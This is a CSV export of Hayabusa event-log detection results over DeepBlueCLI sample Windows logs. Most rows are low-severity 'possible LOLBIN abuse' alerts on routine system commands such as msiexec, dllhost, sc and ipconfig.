2016-09-03 23:45:17.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding A8DCAAB671CE24380F54AE29F32412E9 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x145c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:45:55.086 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:45:55.181 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 227D6E86271C528C6720A7A85951F549 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:46:29.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x171c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:46:30.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 8E27A5AD152700C051A449A753DDD9AD E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1004 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:47:06.223 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x170c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:47:06.332 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding DC56F1E9E9C4D0F4AA05D75E20224E34 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x159c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:47:41.359 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x155c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:47:42.736 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 51E1FCDF5E179FDF27A43218C0B633B2 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1330 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:48:23.665 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:48:23.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4EC0FCB2436E18C9DDD97D27F3913CDB E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:48:46.838 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x6e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:48:47.001 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding DC5E7443C99933DB3C6E89F5CEB1E97F E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:49:56.148 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1608 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:49:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding FCF342A8AA47B271C771D0C94D1CA700 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x158c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:49:59.727 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x16ec | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:03.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:03.998 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 5E2017AA7D1C6A31E9A7DE000332388B E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x4cc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:11.414 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:11.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding BA71DC5EB60F0E63B6B2273896748ED0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x728 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:23.151 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1468 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:23.337 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 63DCF5B6F3ADD0E112DCFCDBC9A49554 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x554 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:37.272 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xae8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:37.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding CE81D9B1345CD9F81599FCA563520F29 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1014 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:52:34.610 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:52:34.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 03F824F4D05CDB05A799DCD0DF81BAF1 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:53:22.275 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1028 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:53:22.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 4DBAF3FC1CB10E33B65E99A4560027B6 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xb90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:53:23.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xefc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 00:52:11.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:19:44.532 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:19:44.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe20 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:19:44.692 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:21:44.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:27:33.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:34:52.733 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x101c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:34:54.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:35:14.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-04 06:35:15.773 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:35:16.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x514 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:35:29.507 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:35:29.601 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:35:40.667 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: IEUser | LID: 0x60b6f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:35:46.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xe90 | User: IEUser | LID: 0x60b6f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:36:24.719 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:36:26.520 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:48:30.867 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x650 | User: IEUser | LID: 0x60b9d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 07:57:17.289 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 07:57:39.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 08:03:14.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 08:03:14.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcc0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 22:32:04.123 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 22:32:05.218 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x93c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 22:32:05.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 22:32:05.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 22:32:15.400 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 22:32:23.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x67c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 23:37:56.230 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 23:37:59.307 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd64 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 23:39:22.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
